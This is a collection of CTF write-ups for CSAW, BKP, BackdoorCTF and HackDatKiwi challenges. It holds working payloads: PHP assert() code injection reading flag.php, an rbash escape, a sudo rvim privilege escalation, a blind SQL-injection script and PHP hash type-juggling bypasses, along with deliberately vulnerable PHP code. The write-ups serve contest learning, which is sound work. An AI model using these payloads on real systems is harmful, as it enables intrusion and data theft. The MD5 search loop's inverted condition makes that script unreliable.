54 | After trying various ways to sneak '..' into the url, I remembered that assertions are generally not advised to be used in production code (at least in Python and PHP), so I looked up the php docs on assertions. It turns out that the string passed to the assert is evaluated as php code, meaning that we can inject code using the $page parameter.
55 | 
56 | After a lot of testing I came up with the solution:
57 | ~~~~
58 | http://web.chal.csaw.io:8000?page=', '..') === false and $myfile = fopen("templates/flag.php", "r") and exit(fread($myfile,filesize("templates/flag.php"))) or true or strpos('
59 | ~~~~
60 | 
61 | When evaluated by index.php, the first assert becomes:
62 | ~~~~
63 | assert("strpos('templates/', '..') === false and $myfile = fopen("templates/flag.php", "r") and exit(fread($myfile,filesize("templates/flag.php"))) or true or strpos('.php', '..') === false") or die("Detected hacking attempt!");
64 | ~~~~
65 | This gets past the first assert, opens the flag.php file, and exits, printing its contents before the assertion fails.
66 | ![flag](images/flag.png)
67 | 
68 | 
69 | 


--------------------------------------------------------------------------------
/2016/CSAW/mfw/images/about.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/mfw/images/about.png


--------------------------------------------------------------------------------
/2016/CSAW/mfw/images/description.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/mfw/images/description.png


--------------------------------------------------------------------------------
/2016/CSAW/mfw/images/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/mfw/images/flag.png


--------------------------------------------------------------------------------
/2016/CSAW/mfw/images/git.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/mfw/images/git.png


--------------------------------------------------------------------------------
/2016/CSAW/mfw/images/website.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2016/CSAW/mfw/images/website.png


--------------------------------------------------------------------------------
/2016/CSAW/mfw/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | if (isset($_GET['page'])) {
 4 | 	$page = $_GET['page'];
 5 | } else {
 6 | 	$page = "home";
 7 | }
 8 | 
 9 | $file = "templates/" . $page . ".php";
10 | 
11 | // I heard '..' is dangerous!
12 | assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
13 | 
14 | // TODO: Make this look nice
15 | assert("file_exists('$file')") or die("That file doesn't exist!");
16 | 
17 | ?>
18 | <!DOCTYPE html>
19 | <html>
20 | 	<head>
21 | 		<meta charset="utf-8">
22 | 		<meta http-equiv="X-UA-Compatible" content="IE=edge">
23 | 		<meta name="viewport" content="width=device-width, initial-scale=1">
24 | 		
25 | 		<title>My PHP Website</title>
26 | 		
27 | 		<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/css/bootstrap.min.css" />
28 | 	</head>
29 | 	<body>
30 | 		<nav class="navbar navbar-inverse navbar-fixed-top">
31 | 			<div class="container">
32 | 		    	<div class="navbar-header">
33 | 		    		<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
34 | 		            	<span class="sr-only">Toggle navigation</span>
35 | 		            	<span class="icon-bar"></span>
36 | 		            	<span class="icon-bar"></span>
37 | 		            	<span class="icon-bar"></span>
38 | 		          	</button>
39 | 		          	<a class="navbar-brand" href="#">Project name</a>
40 | 		        </div>
41 | 		        <div id="navbar" class="collapse navbar-collapse">
42 | 		          	<ul class="nav navbar-nav">
43 | 		            	<li <?php if ($page == "home") { ?>class="active"<?php } ?>><a href="?page=home">Home</a></li>
44 | 		            	<li <?php if ($page == "about") { ?>class="active"<?php } ?>><a href="?page=about">About</a></li>
45 | 		            	<li <?php if ($page == "contact") { ?>class="active"<?php } ?>><a href="?page=contact">Contact</a></li>
46 | 						<!--<li <?php if ($page == "flag") { ?>class="active"<?php } ?>><a href="?page=flag">My secrets</a></li> -->
47 | 		          	</ul>
48 | 		        </div>
49 | 		    </div>
50 | 		</nav>
51 | 		
52 | 		<div class="container" style="margin-top: 50px">
53 | 			<?php
54 | 				require_once $file;
55 | 			?>
56 | 			
57 | 		</div>
58 | 		
59 | 		<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.12.4/jquery.min.js" />
60 | 		<script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/js/bootstrap.min.js" />
61 | 	</body>
62 | </html>


--------------------------------------------------------------------------------
/2017/BKP/vimjail/README.md:
--------------------------------------------------------------------------------
 1 | ![description](images/description.png)
 2 | 
 3 | Upon connecting to the server, I tried running ls and saw that there's a flagReader file.
 4 | 
 5 | By trying to run it, we see that we're in a restricted environment and the error messages show that we're running in rbash.
 6 | ![rbash output](images/rbash.png)
 7 | 
 8 | To escape rbash you can run the following in vim:
 9 | ~~~~
10 | :set shell=/bin/sh
11 | :shell
12 | ~~~~
13 | 
14 | Lets see if there's setuid on the flagReader file:
15 | ~~~~
16 | $ ls -al flagReader
17 | ---S--x--- 1 topsecretuser secretuser 8768 Feb 25 08:42 flagReader
18 | ~~~~
19 | flagReader is executable by secretuser, so lets try to find a way to execute things as secretuser:
20 | 
21 | First I tried listing all files that are setuid to run as secretuser:
22 | ~~~~
23 | find / -user secretuser -perm -4000 -exec ls -ldb {} \; 2> /dev/
24 | ~~~~
25 | 
26 | apparently no other binary will allow us to run as secretuser
27 | 
28 | Now lets see if there's anything that sudo will allow us to run with higher privileges:
29 | ~~~~
30 | $ sudo -l
31 | Matching Defaults entries for ctfuser on
32 |     ip-172-31-31-196.us-west-2.compute.internal:
33 |     env_reset, mail_badpass,
34 |     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
35 | 
36 | User ctfuser may run the following commands on
37 |         ip-172-31-31-196.us-west-2.compute.internal:
38 |     (ALL) NOPASSWD: /usr/bin/sudo -l
39 |     (secretuser) NOPASSWD: /usr/bin/rvim
40 | ~~~~
41 | So this means we can run rvim as secretuser:
42 | ~~~~
43 | $ sudo -u secretuser rvim
44 | ~~~~
45 | rvim doesn't allow you to run shell commands, so we can't use the same shell spawning technique as before. However, rvim does allow you to run python code. Because of this we can just execute flagReader with python: 
46 | ~~~~
47 | :py3 import subprocess
48 | :py3 print(subprocess.check_output(['/home/ctfuser/flagReader']))
49 | ~~~~
50 | and we get the flag:
51 | ~~~~
52 | flag{rVim_is_no_silverbullet!!!111elf}
53 | ~~~~
54 | ![flag](images/flag.png)


--------------------------------------------------------------------------------
/2017/BKP/vimjail/images/description.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2017/BKP/vimjail/images/description.png


--------------------------------------------------------------------------------
/2017/BKP/vimjail/images/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2017/BKP/vimjail/images/flag.png


--------------------------------------------------------------------------------
/2017/BKP/vimjail/images/rbash.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2017/BKP/vimjail/images/rbash.png


--------------------------------------------------------------------------------
/2017/BackdoorCTF/The-Wall/README.md:
--------------------------------------------------------------------------------
  1 | ![description](images/description.png)
  2 | 
  3 | We're given the link to a login form, and the name of the user that we're trying to log in as. On the login page, we're given the source code for the login feature.
  4 | 
  5 | ![login page](images/page.png)
  6 | 
  7 | ```php
  8 | 
  9 | <html>
 10 | <head>
 11 | <title>The Wall</title>
 12 | </head>
 13 | <body>
 14 | <?php
 15 | include 'flag.php';
 16 | 
 17 | if(isset($_REQUEST['life'])&&isset($_REQUEST['soul'])){
 18 |     $username = $_REQUEST['life'];
 19 |     $password = $_REQUEST['soul'];
 20 | 
 21 |     if(!(is_string($username)&&is_string($password))){
 22 |         header( "refresh:1;url=login.html");
 23 |         die("You are not allowed south of wall");
 24 |     }
 25 | 
 26 |     $password = md5($password);
 27 |     
 28 |     include 'connection.php';
 29 |     /*CREATE TABLE IF NOT EXISTS users(id INTEGER PRIMARY KEY AUTOINCREMENT,username TEXT,password TEXT,role TEXT)*/
 30 | 
 31 |     $message = "";
 32 |     if(preg_match('/(union|\|)/i', $username)){
 33 |         $message="Dead work alone not in UNIONs"."</br>";
 34 |         echo $message;
 35 |         die();
 36 |     }
 37 |     $query = "SELECT * FROM users WHERE username='$username'";
 38 |     $result = $pdo->query($query);
 39 |     $users = $result->fetchArray(SQLITE3_ASSOC);
 40 | 
 41 |     if($users) {
 42 |         if($password == $users['password']){
 43 |             if($users['role']=="admin"){
 44 |                 echo "Here is your flag: $flag";
 45 |             }elseif($users['role']=="normal"){
 46 |                 $message = "Welcome, ".$users['users']."</br>";
 47 |                 $message.= "Unfortunately, only Lord Commander can access flag";
 48 |             }else{
 49 |                 $message = "What did you do?";
 50 |             }
 51 |         }
 52 |         else{
 53 |             $message = "Wrong identity for : ".$users['username'];
 54 |         }
 55 | 
 56 |     }
 57 |     else{
 58 |         $message = "No such person exists"."<br>";
 59 |     }
 60 |     echo $message;
 61 | }else{
 62 |     header( "refresh:1;url=login.html");
 63 |     die("Only living can cross The Wall");
 64 | }
 65 | ?>
 66 | 
 67 | </body>
 68 | </html>
 69 | 
 70 | ```
 71 | 
 72 | By looking at the php, we can see that there's a classic example of an SQL injection vulnerability in the following code:
 73 | 
 74 | ```php
 75 |     $query = "SELECT * FROM users WHERE username='$username'";
 76 |     $result = $pdo->query($query);
 77 |     $users = $result->fetchArray(SQLITE3_ASSOC);
 78 | ```
 79 | 
 80 | If we insert a username containing a ', we can end the where clause and insert our own SQL commands into the query.
 81 | 
 82 | Normally at this point, I'd try to pull information out of the database using the UNION command, but the php code filters any form of "union" in the input, so we need to find a different way.
 83 | 
 84 | By messing around with the login form and looking at the source code, we noticed that we get different outputs depending on whether or not the SELECT statement returned at least 1 user. When the SELECT statement finds a user, and we give the wrong password, we get an output of "Wrong identity for : ".$users['username'], but when we don't find a valid user we get an output of "No such person exists". As such, we can insert code into the SQL query that will cause the SELECT to only return a user conditional on some information about their password. 
 85 | 
 86 | The way we did this is by adding onto the WHERE clause: we used a username of the form "LordCommander' AND password LIKE 'a%", in order to find whether or not the password starts with an a (the % sign in SQL is a wildcard character, so a% matches any string starting with an a). When inserted into the SQL query string, the query becomes: 
 87 | 
 88 | ```sql
 89 | "SELECT * FROM users WHERE username='LordCommander' AND password LIKE 'a%'"
 90 | ```
 91 | 
 92 | This test can be done for all of the characters in the set "01234567890abcdef" (since the stored value is an md5 hash) to find what character the password starts with, and this process can be repeated for every character of the password. Since we only have to guess 16 times at most per character of the password, this can be done very quickly.
 93 | 
 94 | To automate this, we wrote a quick python script that uses the requests library to interact with the website:
 95 | 
 96 | ```python
 97 | import requests
 98 | import string
 99 | 
100 | url = 'http://163.172.176.29/WALL/index.php'
101 | 
102 | response = ''
103 | sofar = ''
104 | while True:
105 |     done = 1
106 |     for char in "0123456789abcdef":
107 |         print(char)
108 |         params = {'life':'LordCommander\' AND password LIKE \''+ sofar + char + '%', 'soul':''}
109 |         r = requests.post(url, data=params)
110 | 
111 |         if "Wrong identity" in r.text:
112 |             sofar += char
113 |             print("sofar=", sofar)
114 |             done = 0
115 |             break
116 |     if done == 1:
117 |         break
118 | print sofar
119 | 
120 | ```
121 | 
122 | Running the script gets us the md5 hash of the password: 0e565041023046045310587974628079
123 | 
124 | Running the hash through online hash crackers doesn't find anything. By looking back at the source code, we can see that the hashes are compared with the == operator:
125 | 
126 | ```php
127 | if($password == $users['password'])
128 | ```
129 | 
130 | The double equals operator is notoriously bad, and there's a fairly well known vulnerability with the operator in that two strings starting with "0e" will always compare as true. This is because the == operator does automatic type casting, and considers strings of the form "0exxxxxx" to be the same as the integer 0 * e^{xxxxxx}. Therefore when two strings starting with "0e" are compared, they both get casted to the integer 0, and the comparison will always evaluate to true.
131 | 
132 | By googling "0e php hash vulnerability", we can find another string whose hash starts with "0e" (I used the string "240610708"). By entering this as the password, we'll get past the password check, and will log in as the admin. We were given the flag on the admin page.


--------------------------------------------------------------------------------
/2017/BackdoorCTF/The-Wall/The Wall.html:
--------------------------------------------------------------------------------
 1 | 
 2 | <!-- saved from url=(0037)http://163.172.176.29/WALL/login.html -->
 3 | <html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
 4 | <title>The Wall</title>
 5 | </head>
 6 | <body>
 7 | <form action="http://163.172.176.29/WALL/index.php" method="POST">
 8 | Username:<input type="text" name="life"><br>
 9 | Password:<input type="password" name="soul"><br>
10 | <input type="submit">
11 | </form>
12 | <br>
13 | Here is the sourec of <a href="http://163.172.176.29/WALL/source.php">index.php</a>
14 | 
15 | 
16 | </body></html>


--------------------------------------------------------------------------------
/2017/BackdoorCTF/The-Wall/images/description.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2017/BackdoorCTF/The-Wall/images/description.png


--------------------------------------------------------------------------------
/2017/BackdoorCTF/The-Wall/images/page.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2017/BackdoorCTF/The-Wall/images/page.png


--------------------------------------------------------------------------------
/2017/BackdoorCTF/The-Wall/source.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <head>
 3 | <title>The Wall</title>
 4 | </head>
 5 | <body>
 6 | <?php
 7 | include 'flag.php';
 8 | 
 9 | if(isset($_REQUEST['life'])&&isset($_REQUEST['soul'])){
10 |     $username = $_REQUEST['life'];
11 |     $password = $_REQUEST['soul'];
12 | 
13 |     if(!(is_string($username)&&is_string($password))){
14 |         header( "refresh:1;url=login.html");
15 |         die("You are not allowed south of wall");
16 |     }
17 | 
18 |     $password = md5($password);
19 |     
20 |     include 'connection.php';
21 |     /*CREATE TABLE IF NOT EXISTS users(id INTEGER PRIMARY KEY AUTOINCREMENT,username TEXT,password TEXT,role TEXT)*/
22 | 
23 |     $message = "";
24 |     if(preg_match('/(union|\|)/i', $username)){
25 |         $message="Dead work alone not in UNIONs"."</br>";
26 |         echo $message;
27 |         die();
28 |     }
29 |     $query = "SELECT * FROM users WHERE username='$username'";
30 |     $result = $pdo->query($query);
31 |     $users = $result->fetchArray(SQLITE3_ASSOC);
32 | 
33 |     if($users) {
34 |         if($password == $users['password']){
35 |             if($users['role']=="admin"){
36 |                 echo "Here is your flag: $flag";
37 |             }elseif($users['role']=="normal"){
38 |                 $message = "Welcome, ".$users['users']."</br>";
39 |                 $message.= "Unfortunately, only Lord Commander can access flag";
40 |             }else{
41 |                 $message = "What did you do?";
42 |             }
43 |         }
44 |         else{
45 |             $message = "Wrong identity for : ".$users['username'];
46 |         }
47 | 
48 |     }
49 |     else{
50 |         $message = "No such person exists"."<br>";
51 |     }
52 |     echo $message;
53 | }else{
54 |     header( "refresh:1;url=login.html");
55 |     die("Only living can cross The Wall");
56 | }
57 | ?>
58 | 
59 | </body>
60 | </html>


--------------------------------------------------------------------------------
/2017/BackdoorCTF/The-Wall/the-wall.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import string
 3 | 
 4 | url = 'http://163.172.176.29/WALL/index.php'
 5 | 
 6 | response = ''
 7 | sofar = ''
 8 | while True:
 9 |     done = 1
10 |     for char in "0123456789abcdef":
11 |         print(char)
12 |         params = {'life':'LordCommander\' AND password LIKE \''+ sofar + char + '%', 'soul':''}
13 |         r = requests.post(url, data=params)
14 | 
15 |         if "LordCommander" in r.text:
16 |             sofar += char
17 |             print("sofar=", sofar)
18 |             done = 0
19 |             break
20 |     if done == 1:
21 |         break
22 | print sofar
23 | 


--------------------------------------------------------------------------------
/2017/CSAW/tableEz/README.md:
--------------------------------------------------------------------------------
  1 | ![description](images/description.png)
  2 | 
  3 | The challenge gives us a binary to analyze.
  4 | 
  5 | Here's the decompiled main method of the program in IDA:
  6 | 
  7 | ![main code](images/main.png)
  8 | 
  9 | From this, we can see that the program reads our input, and then replaces every character of the input with the result of a call to get_tbl_entry. After the input is done being transformed, it compares the result to some constant string defined in the program (the string stored in s2 in the decompiled code).
 10 | 
 11 | Lets see what the get_tbl_entry function is doing to our input:
 12 | 
 13 | ![get_tbl_entry code](images/get_tbl_entry.png)
 14 | 
 15 | From this code, we can see that every time the function is called, it loops through a table until it finds our input, and then returns the corresponding item from the byte_201281 array. Lets see how these tables are stored:
 16 | 
 17 | ![table](images/table.png)
 18 | 
 19 | From this we can see that the byte_201281 array is the same table as trans_tbl, just offset by one. This means that every time a character of our input is found in the table, the function returns the next entry in the table. This can be easily reversed by simply copying the final string that our transformed input is compared against in main, and then doing the opposite of the table lookups on it (find each character of the final output, find it in the table, and return the value before it). 
 20 | 
 21 | Another way of doing this is by patching the program to invert the functionality of get_tbl_entry. If we change the code to instead find the entry in the byte_201281 array, and then return the element before it in the table, we can simply enter the final string that our transformed input is compared against, and the program will decode it for us.
 22 | 
 23 | ![get_tbl_entry dissassembly](images/get_tbl_entry_dasm.png)
 24 | 
 25 | From the disassembly, we can see that the addresses of trans_tbl and the byte_201281 array are loaded during instructions at addresses 0x865 and 0x87d respectively. If we patch the instruction that loads trans_tbl to instead load trans_tbl + 1, and the instruction that loads byte_201281 to instead load byte_201281 - 1, the functionality of get_tbl_entry will be reversed.
 26 | 
 27 | To do this, I patched the program in radare2.
 28 | 
 29 | ```
 30 | default@CTF:~/Desktop/Repos/CTF_WRITEUPS_NEW/CTF-Writeups/2017/CSAW/tableEz$ cp tablez tablez_patched
 31 | default@CTF:~/Desktop/Repos/CTF_WRITEUPS_NEW/CTF-Writeups/2017/CSAW/tableEz$ r2 -Aw tablez_patched
 32 | [x] Analyze all flags starting with sym. and entry0 (aa)
 33 | [x] Analyze len bytes of instructions for references (aar)
 34 | [x] Analyze function calls (aac)
 35 | [ ] [*] Use -AA or aaaa to perform additional experimental analysis.
 36 | [x] Constructing a function name for fcn.* and sym.func.* functions (aan))
 37 |  -- Using radare2 to generate intelligence ...
 38 | [0x00000740]> 0x865
 39 | [0x00000865]> pdf
 40 | / (fcn) sym.get_tbl_entry 86
 41 | |           ; arg int arg_2h @ rbp+0x2
 42 | |           ; arg int arg_feh @ rbp+0xfe
 43 | |           ; var int local_8h @ rbp-0x8
 44 | |           ; var int local_14h @ rbp-0x14
 45 | |           ; CALL XREF from 0x0000098f (sym.main)
 46 | |           0x0000084a      55             push rbp
 47 | |           0x0000084b      4889e5         mov rbp, rsp
 48 | |           0x0000084e      89f8           mov eax, edi
 49 | |           0x00000850      8845ec         mov byte [rbp - local_14h], al
 50 | |           0x00000853      48c745f80000.  mov qword [rbp - local_8h], 0
 51 | |       ,=< 0x0000085b      eb32           jmp 0x88f
 52 | |       |   ; JMP XREF from 0x00000897 (sym.get_tbl_entry)
 53 | |      .--> 0x0000085d      488b45f8       mov rax, qword [rbp - local_8h]
 54 | |      ||   0x00000861      488d1400       lea rdx, [rax + rax]
 55 | |      ||   0x00000865      488d05140a20.  lea rax, [rip + 0x200a14]   ; 0x201280 ; obj.trans_tbl ; obj.trans_tbl
 56 | |      ||   0x0000086c      0fb60402       movzx eax, byte [rdx + rax]
 57 | |      ||   0x00000870      3845ec         cmp byte [rbp - local_14h], al ; [0x2:1]=76
 58 | |     ,===< 0x00000873      7515           jne 0x88a
 59 | |     |||   0x00000875      488b45f8       mov rax, qword [rbp - local_8h]
 60 | |     |||   0x00000879      488d1400       lea rdx, [rax + rax]
 61 | |     |||   0x0000087d      488d05fd0920.  lea rax, [rip + 0x2009fd]   ; 0x201281
 62 | |     |||   0x00000884      0fb60402       movzx eax, byte [rdx + rax]
 63 | |    ,====< 0x00000888      eb14           jmp 0x89e
 64 | |    ||||   ; JMP XREF from 0x00000873 (sym.get_tbl_entry)
 65 | |    |`---> 0x0000088a      488345f801     add qword [rbp - local_8h], 1
 66 | |    | ||   ; JMP XREF from 0x0000085b (sym.get_tbl_entry)
 67 | |    | |`-> 0x0000088f      48817df8fe00.  cmp qword [rbp - local_8h], 0xfe ; [0xfe:8]=0x2010000000
 68 | |    | `==< 0x00000897      76c4           jbe 0x85d
 69 | |    |      0x00000899      b800000000     mov eax, 0
 70 | |    |      ; JMP XREF from 0x00000888 (sym.get_tbl_entry)
 71 | |    `----> 0x0000089e      5d             pop rbp
 72 | \           0x0000089f      c3             ret
 73 | [0x00000865]> 
 74 | ```
 75 | 
 76 | We can see that the existing instruction is lea rax, [rip + 0x200a14]. So to patch this, we should instead load [rip + 0x200a15], which is 1 byte higher in the address space. For some reason r2 uses rip-based addressing by default when writing instructions, we we can simply write the instruction lea rax, [0x200a15]. We can also do the same at address 0x87d by changing the instruction to lea rax, [0x2009fc]. 
 77 | 
 78 | ```
 79 | [0x00000865]> wa lea rax, [0x200a15]
 80 | Written 7 bytes (lea rax, [0x200a15]) = wx 488d05150a2000
 81 | [0x00000865]> 0x87d
 82 | [0x0000087d]> wa lea rax, [0x2009fc]
 83 | Written 7 bytes (lea rax, [0x2009fc]) = wx 488d05fc092000
 84 | ```
 85 | 
 86 | Now we need to get the string that we want to decode back into the flag. By looking at the disassembly, we can see the area in the code where the string is being loaded into the buffer:
 87 | 
 88 | ![string contents](images/string_info.png)
 89 | 
 90 | Since the values are little endian, we can just copy the byte contents in reverse to get the string. I wrote the string to a file to make it easier to use as input to the program:
 91 | 
 92 | ```bash
 93 | echo $'\x27\xb3\x73\x9d\xf5\x11\xe7\xb1\xb3\xbe\x99\xb3\xf9\xf9\xf4\x30\x1b\x71\x99\x73\x23\x65\x99\xb1\x65\x11\x11\xbe\x23\x99\x27\xf9\x23\x99\x05\x65\xce' > test_input.txt
 94 | ```
 95 | 
 96 | I then debugged the program with GDB to set a breakpoint on the code after our string is decoded, so that I can read the result out of memory. By looking at the disassembly, we can see that, after the string gets decoded, the length will be checked at address 0x9c1, so I decided to set a breakpoint there to read the decoded string.
 97 | 
 98 | 
 99 | GDB rebased the program (loading the program at address 0x555555554000), so I found where main was located to find out how much I should offset the address 0x9c1 by to get its new location.
100 | 
101 | ```
102 | default@CTF:~/Desktop/Repos/CTF_WRITEUPS_NEW/CTF-Writeups/2017/CSAW/tableEz$ gdb tablez_patched 
103 | 
104 | gdb-peda$ r
105 | Starting program: /home/default/Desktop/Repos/CTF_WRITEUPS_NEW/CTF-Writeups/2017/CSAW/tableEz/tablez_patched 
106 | Please enter the flag:
107 | ^C
108 | Program received signal SIGINT, Interrupt.
109 | 
110 | gdb-peda$ info addr main
111 | Symbol "main" is at 0x5555555548a0 in a file compiled without debugging.
112 | 
113 | gdb-peda$ b *0x5555555549c1
114 | Breakpoint 1 at 0x5555555549c1
115 | 
116 | gdb-peda$ r  < test_input.txt
117 | Starting program: /home/default/Desktop/Repos/CTF_WRITEUPS_NEW/CTF-Writeups/2017/CSAW/tableEz/tablez_patched < test_input.txt
118 | Please enter the flag:
119 | [----------------------------------registers-----------------------------------]
120 | RAX: 0x25 ('%')
121 | RBX: 0x0 
122 | RCX: 0x7d ('}')
123 | RDX: 0x7fffffffd800 ("flag{t4ble_l00kups_ar3_b3tter_f0r_m3}")
124 | RSI: 0x555555756446 --> 0x0 
125 | RDI: 0xffffffce 
126 | RBP: 0x7fffffffd890 --> 0x555555554a40 (<__libc_csu_init>:  push   r15)
127 | RSP: 0x7fffffffd7c0 --> 0x25 ('%')
128 | RIP: 0x5555555549c1 (<main+289>:    cmp    QWORD PTR [rbp-0xc8],0x25)
129 | R8 : 0xc0e0 
130 | R9 : 0x0 
131 | R10: 0x309 
132 | R11: 0x7ffff7a98720 (<strlen>:  pxor   xmm0,xmm0)
133 | R12: 0x555555554740 (<_start>:  xor    ebp,ebp)
134 | R13: 0x7fffffffd970 --> 0x1 
135 | R14: 0x0 
136 | R15: 0x0
137 | EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
138 | [-------------------------------------code-------------------------------------]
139 |    0x5555555549b1 <main+273>:   mov    rax,QWORD PTR [rbp-0xd0]
140 |    0x5555555549b8 <main+280>:   cmp    rax,QWORD PTR [rbp-0xc8]
141 |    0x5555555549bf <main+287>:   jb     0x555555554976 <main+214>
142 | => 0x5555555549c1 <main+289>:   cmp    QWORD PTR [rbp-0xc8],0x25
143 |    0x5555555549c9 <main+297>:   je     0x5555555549de <main+318>
144 |    0x5555555549cb <main+299>:   lea    rdi,[rip+0x109]        # 0x555555554adb
145 |    0x5555555549d2 <main+306>:   call   0x555555554700 <puts@plt>
146 |    0x5555555549d7 <main+311>:   mov    eax,0x1
147 | [------------------------------------stack-------------------------------------]
148 | 0000| 0x7fffffffd7c0 --> 0x25 ('%')
149 | 0008| 0x7fffffffd7c8 --> 0x25 ('%')
150 | 0016| 0x7fffffffd7d0 --> 0xb1e711f59d73b327 
151 | 0024| 0x7fffffffd7d8 --> 0x30f4f9f9b399beb3 
152 | 0032| 0x7fffffffd7e0 --> 0xb19965237399711b 
153 | 0040| 0x7fffffffd7e8 --> 0xf9279923be111165 
154 | 0048| 0x7fffffffd7f0 --> 0xce65059923 
155 | 0056| 0x7fffffffd7f8 --> 0x0 
156 | [------------------------------------------------------------------------------]
157 | Legend: code, data, rodata, value
158 | 
159 | Breakpoint 1, 0x00005555555549c1 in main ()
160 | gdb-peda$ 
161 | ```
162 | Then we can see that the flag has been decoded (in this case it happens to be stored in rdx).


--------------------------------------------------------------------------------
/2017/CSAW/tableEz/images/description.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2017/CSAW/tableEz/images/description.png


--------------------------------------------------------------------------------
/2017/CSAW/tableEz/images/get_tbl_entry.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2017/CSAW/tableEz/images/get_tbl_entry.png


--------------------------------------------------------------------------------
/2017/CSAW/tableEz/images/get_tbl_entry_dasm.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2017/CSAW/tableEz/images/get_tbl_entry_dasm.png


--------------------------------------------------------------------------------
/2017/CSAW/tableEz/images/main.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2017/CSAW/tableEz/images/main.png


--------------------------------------------------------------------------------
/2017/CSAW/tableEz/images/string_info.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2017/CSAW/tableEz/images/string_info.png


--------------------------------------------------------------------------------
/2017/CSAW/tableEz/images/table.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2017/CSAW/tableEz/images/table.png


--------------------------------------------------------------------------------
/2017/CSAW/tableEz/tablez:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/birdsoup/CTF-Writeups/feaeda46a5afa3dabbfa81adcbe184f7bc24d5cb/2017/CSAW/tableEz/tablez


--------------------------------------------------------------------------------
/2017/HackDatKiwi/MD5 Games 1/README.md:
--------------------------------------------------------------------------------
 1 | We're given the following source code:
 2 | ```php
 3 | <?php
 4 | if (isset($_GET['src']))
 5 |     highlight_file(__FILE__) and die();
 6 | if (isset($_GET['md5']))
 7 | {
 8 |     $md5=$_GET['md5'];
 9 |     if ($md5==md5($md5))
10 |         echo "Wonderbubulous! Flag is ".require __DIR__."/flag.php";
11 |     else
12 |         echo "Nah... '",htmlspecialchars($md5),"' not the same as ",md5($md5);
13 | }
14 | 
15 | ?>
16 | <p>Find a string that has a MD5 digest equal to itself!</p>
17 | <form>
18 |     <label>Answer: </label>
19 |     <input type='text' name='md5' />
20 |     <input type='submit' />
21 | </form>
22 | 
23 | <a href='?src'>Source Code</a>
24 | ```
25 | We see that the md5's are compared with == instead of ===, which makes them vulnerable to type juggling vulnerabilities. 
26 | In particular, if two strings both start with "0e" and contain numbers afterward, the == operator will always return that they're true. (Both get casted to integers of the form 0 * e ^{the remaining string}, so it returns 0 == 0).
27 | 
28 | To solve this, I just wrote a quick PHP script to generate strings of this form until one hashed to a hash of this form.
29 | 
30 | ```php
31 | <?php
32 | echo "running script";
33 |  $base = "0e";
34 |  $result = "";
35 |  $curr_number = 0; 
36 |  do {
37 |   $curr = $base . "$curr_number";
38 |   $result = md5($curr);
39 |   $curr_number += 1;
40 |   }
41 |  while ($curr == $result);
42 | echo "\n";
43 | echo $curr;
44 | echo "\n";
45 | echo $result;
46 | echo "\n";
47 | ```
48 | 
49 | After leaving this running for a few minutes, it finds a solution, which gives us the flag when entered on the page.
50 | 


--------------------------------------------------------------------------------
/2017/HackDatKiwi/MD5 Games 1/hdk_md5.html:
--------------------------------------------------------------------------------
 1 | <?php
 2 | if (isset($_GET['src']))
 3 |     highlight_file(__FILE__) and die();
 4 | if (isset($_GET['md5']))
 5 | {
 6 |     $md5=$_GET['md5'];
 7 |     if ($md5==md5($md5))
 8 |         echo "Wonderbubulous! Flag is ".require __DIR__."/flag.php";
 9 |     else
